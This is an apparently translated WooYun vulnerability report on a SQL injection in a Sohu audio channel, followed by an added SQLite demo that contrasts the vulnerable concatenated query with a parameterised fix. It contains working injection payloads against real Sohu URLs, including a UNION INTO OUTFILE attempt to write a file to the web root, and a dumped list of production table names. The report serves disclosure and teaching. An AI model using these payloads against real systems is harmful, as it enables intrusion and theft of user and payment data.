Vulnerability summary (followers: 24)
Defect ID: wooyun-2013-025506
Title: An injection in a Sohu channel
Vendor: 搜狐 (Sohu)
Author: 逆雪寒
Submitted: 2013-06-09 10:29
Fixed: 2013-07-24 10:29
Published: 2013-07-24 10:29
Type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: confirmed by vendor
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2013-06-09: Details sent to the vendor, awaiting vendor handling
2013-06-09: Vendor confirmed; details disclosed to the vendor only
2013-06-19: Details disclosed to core white hats and relevant domain experts
2013-06-29: Details disclosed to regular white hats
2013-07-09: Details disclosed to intern white hats
2013-07-24: Details disclosed to the public
Brief description:
SQL injection, the same old problem.
Detailed description:
Found this URL: http://ting.sohu.com/send/sending_setcookie.php?cpcode=asdf
The name looks like "set cookie"... force of habit, I appended a single quote ' and got the following:
Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''asdf'' and t1.product_name=t2.product_name' at line 1 on /mfs/wwwroot/ting/send/mysql30/class/class.mysql.php line 13 Sql select t1.audio_url,t2.product_name,t1.sub_product_name,t2.product_id,t1.theorder,t1.sub_product_id from t_sub_product t1,t_product t2 where t1.sub_product_id='asdf'' and t1.product_name=t2.product_name
Wow, the path leaked, and the SQL is clearly influenced by external input. An injection is born.
Time to bring out the tool.
Finally I also tried outfile ...
http://ting.sohu.com/send/balance_user.php?userid_comm=d'%20and%20t1.user_id=t2.user_id%20%20%20union%20all%20select%20%22xxddoo%22,2,3%20INTO%20OUTFILE%20%22/mfs/wwwroot/ting/send/nixuehan.html%22--%20'
The result:
Error 1045: Access denied for user 'wcms_tsw'@'192.168.%' (using password: YES) on /mfs/wwwroot/ting/send/mysql30/class/class.mysql.php line 13 Sql SELECT t1.thevalue,t1.user_type,t1.thedate from t_user_info t1,t_user t2 where t2.user_name='d' and t1.user_id=t2.user_id union all select "xxddoo",2,3 INTO OUTFILE "/mfs/wwwroot/ting/send/nixuehan.html"-- '' and t1.user_id=t2.user_id
Not bad, no FILE privilege. That part was done well; otherwise it might have been a shell.
Proof of vulnerability:
Database: tsw
[101 tables]
+----------------------------------+
| customer |
| passport_temp |
| t_adinfo |
| t_android_catagory |
| t_android_channel |
| t_android_channel_log |
| t_android_comm |
| t_android_log |
| t_android_product |
| t_android_sub_product |
| t_android_user_favorite |
| t_audition_currentday_log |
| t_audition_log |
| t_audition_log_log |
| t_audition_log_log_before_201208 |
| t_award_info_for_monthly_user |
| t_baoyue_mobile_online |
| t_baoyue_month_send_info |
| t_blog |
| t_book_folder |
| t_book_folder_info |
| t_card_order_log |
| t_card_type |
| t_card_type_bak |
| t_client_adv |
| t_client_adv_clicklog |
| t_client_adv_showlog |
| t_client_audition_log |
| t_client_channel |
| t_client_channel_catalog |
| t_client_channel_catalog_product |
| t_client_channel_product |
| t_client_feedback |
| t_client_link |
| t_client_parameter |
| t_client_pwd_log |
| t_client_search_log |
| t_client_type |
| t_client_user |
| t_client_user_fancy |
| t_code |
| t_code_200yueka |
| t_code_50yueka_10jika |
| t_corporation |
| t_cpname_month |
| t_date_dimension |
| t_favorite_log |
| t_iphone_audition_log |
| t_iphone_channel |
| t_iphone_login_submit_log |
| t_iphone_logined_info |
| t_iphone_order_create_log |
| t_iphone_order_result_log |
| t_mobile_segment_info |
| t_mt_month_log |
| t_mtry_listen_count |
| t_order_pay_log |
| t_pay_bank |
| t_pay_bank_log |
| t_pay_charge_log |
| t_pay_forbook_process_log |
| t_pay_mobileno_quit |
| t_pay_recharge_log |
| t_pay_rechargemode |
| t_pay_sms_log |
| t_pc_download |
| t_product |
| t_product_adinfo |
| t_product_ding |
| t_product_type |
| t_record_cart_log |
| t_record_prepay_log |
| t_record_prepay_product_info |
| t_rq_top |
| t_sms_content_info |
| t_sms_gwid_oid_info |
| t_stat_login_personcount |
| t_stat_m_month_info |
| t_stat_nlogin_personcount |
| t_stat_product |
| t_stat_search |
| t_stat_stry_listen_count |
| t_stat_ting_income_register_info |
| t_stat_ting_sub_product_info |
| t_stat_trylisten_personcount |
| t_sub_product |
| t_try_listen_count |
| t_tsw_sms_log |
| t_user |
| t_user_info |
| t_user_info_log |
| t_user_info_monthly |
| t_user_product_bind_info |
| t_user_product_info |
| t_user_zhubo_info |
| t_wap_down_log |
| t_wap_log |
| t_wo_folder_info |
| t_zhubo_renwu |
| t_zhubo_zizhi_text |
| t_zhubo_zizhi_upload |
+----------------------------------+
Fix recommendation:
Sohu's developers understand this better than I do.
Copyright: when reposting, please credit the source 逆雪寒@乌云 (WooYun)
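As an added example, not code from the report or from Sohu, the query shape visible in the leaked error message is rebuilt here on an in-memory SQLite database (standing in for MySQL), with the vulnerable string-concatenation form beside the parameterised form that fixes it. The table layout, sample rows and payload are constructed for the demo; the `INTO OUTFILE` clause from the report's second attempt is MySQL-only and is left out, but the payload keeps the same structure (close the literal, append a UNION with a matching column count, comment out the rest).

```python
"""Added example, not code from the WooYun report or from Sohu: the query
shape shown in the leaked error rebuilt on an in-memory SQLite database,
with the vulnerable string-concatenation form beside a parameterised one.
Table layout and sample rows are constructed; SQLite stands in for MySQL."""
import sqlite3

# Constructed rows for the two tables named in the leaked query.
SCHEMA = """
CREATE TABLE t_product (product_id INTEGER, product_name TEXT);
CREATE TABLE t_sub_product (
    sub_product_id TEXT, sub_product_name TEXT, audio_url TEXT,
    theorder INTEGER, product_name TEXT);
INSERT INTO t_product VALUES (1, 'book');
INSERT INTO t_sub_product VALUES
    ('s1', 'chapter 1', 'http://example.invalid/1.mp3', 1, 'book');
"""

# Same column list and join as the query in the report's error message.
SELECT = ("select t1.audio_url,t2.product_name,t1.sub_product_name,"
          "t2.product_id,t1.theorder,t1.sub_product_id "
          "from t_sub_product t1,t_product t2 ")

# Payload in the shape of the report's outfile attempt: close the literal,
# append a UNION with the same column count (6 here), comment out the rest.
# INTO OUTFILE is MySQL-only, so it is left out of this SQLite demo.
UNION_PAYLOAD = "x' union all select 'injected',2,3,4,5,6-- "


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def lookup_vulnerable(db, sub_product_id):
    # Deliberately vulnerable: user input is spliced into the SQL text,
    # which is what the leaked query shows happening on the server.
    sql = (SELECT + "where t1.sub_product_id='" + sub_product_id +
           "' and t1.product_name=t2.product_name")
    return db.execute(sql).fetchall()


def lookup_safe(db, sub_product_id):
    # Hardened: the same query with a bound parameter. The driver passes the
    # value as data, so quotes and comment markers never reach the parser.
    sql = SELECT + "where t1.sub_product_id=? and t1.product_name=t2.product_name"
    return db.execute(sql, (sub_product_id,)).fetchall()


def probe(db, lookup, value):
    """Run one lookup and report ('rows', rows) or ('error', message)."""
    try:
        return ("rows", lookup(db, value))
    except sqlite3.Error as e:
        return ("error", str(e))


if __name__ == "__main__":
    db = make_db()
    for value in ("s1", "asdf'", UNION_PAYLOAD):
        print(repr(value), "vulnerable:", probe(db, lookup_vulnerable, value))
        print(repr(value), "safe:      ", probe(db, lookup_safe, value))
```

Running it, the lone quote `asdf'` makes the concatenated query fail to parse (the same class of error the report shows from MySQL), the UNION payload returns an attacker-chosen row from the concatenated query, and the parameterised query returns no rows for either input while still finding the legitimate `s1`. Two further points a practitioner would check on the real system: the `Error 1045 ... Access denied` in the report is MySQL refusing `INTO OUTFILE` because the application account lacks the `FILE` privilege (verifiable with `SHOW GRANTS FOR CURRENT_USER()` and the `secure_file_priv` setting), which is the right posture; but the error text itself, with the server path and the full statement, should never reach a client, so error display has to be turned off in production independently of fixing the query.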
Vulnerability response
Vendor response:
Severity: High
Vulnerability Rank: 15
Confirmed: 2013-06-09 10:59
Vendor reply:
Thank you for your attention to Sohu's security.
Latest status:
None yet